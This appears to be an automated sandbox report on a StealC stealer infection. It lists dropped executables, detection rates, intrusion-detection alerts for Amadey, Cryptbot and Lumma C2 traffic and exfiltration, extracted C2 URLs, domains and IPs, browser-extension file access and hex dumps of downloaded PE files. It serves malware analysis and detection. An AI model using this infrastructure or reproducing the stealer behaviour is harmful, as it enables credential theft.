                      Source: file.exe.5740.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeReversingLabs: Detection: 42%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeReversingLabs: Detection: 39%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeReversingLabs: Detection: 52%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exeReversingLabs: Detection: 39%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeReversingLabs: Detection: 31%
                      Source: C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exeReversingLabs: Detection: 31%
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeReversingLabs: Detection: 42%
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeReversingLabs: Detection: 39%
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeReversingLabs: Detection: 39%
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeReversingLabs: Detection: 52%
                      Multi AV Scanner detection for submitted file
                      Source: file.exeReversingLabs: Detection: 39%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C976C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C976C80
                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_26f8cf44-7
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49823 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49837 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49839 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49848 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50066 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:50111 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50116 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50118 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50120 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50119 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50119 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50122 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50125 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50126 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50133 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50137 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50141 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50142 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50153 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50159 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50164 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50167 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50171 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50175 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50176 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50178 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50196 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50198 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50203 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50207 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50206 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:52382 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52383 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52385 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52393 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52394 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.6:52412 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.42.65.92:443 -> 192.168.2.6:52414 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:52418 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.6:52420 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52419 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52423 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52425 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:52426 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52424 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:52428 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52448 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52449 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52445 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52446 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52444 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52447 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52450 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52451 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:52481 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.182.143.214:443 -> 192.168.2.6:52496 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52511 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52513 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52509 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52512 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52510 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52514 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52516 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52517 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52518 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:52533 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:52594 version: TLS 1.2
                      Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp
                      Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp
                      Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp
                      Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: fb696bafb5.exe, 00000028.00000003.3005248490.0000000004910000.00000004.00001000.00020000.00000000.sdmp, fb696bafb5.exe, 00000028.00000002.3144548867.0000000000592000.00000040.00000001.01000000.00000013.sdmp
                      Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: chrome.exeMemory has grown: Private usage: 0MB later: 42MB
                      Source: firefox.exeMemory has grown: Private usage: 1MB later: 181MB

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49742 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49742 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49742
                      Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49742 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49742
                      Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49742 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:50108 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:50109
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50112 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50115 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50121 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:50132 -> 34.116.198.130:80
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50124 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50127 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50138 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:50134 -> 34.116.198.130:80
                      Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:50155 -> 34.116.198.130:80
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50169 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:52538 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50118 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50118 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50137 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50137 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50122 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50133 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50141 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50141 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50116 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50116 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50176 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50142 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50178 -> 188.114.96.3:443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
                      Source: Malware configuration extractorURLs: peepburry828.sbs
                      Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
                      Source: Malware configuration extractorURLs: p3ar11fter.sbs
                      Source: Malware configuration extractorURLs: processhol.sbs
                      Source: Malware configuration extractorURLs: p10tgrace.sbs
                      Source: Malware configuration extractorIPs: 185.215.113.43
                      Source: global trafficTCP traffic: 192.168.2.6:52357 -> 1.1.1.1:53
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:54:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:54:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:54:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 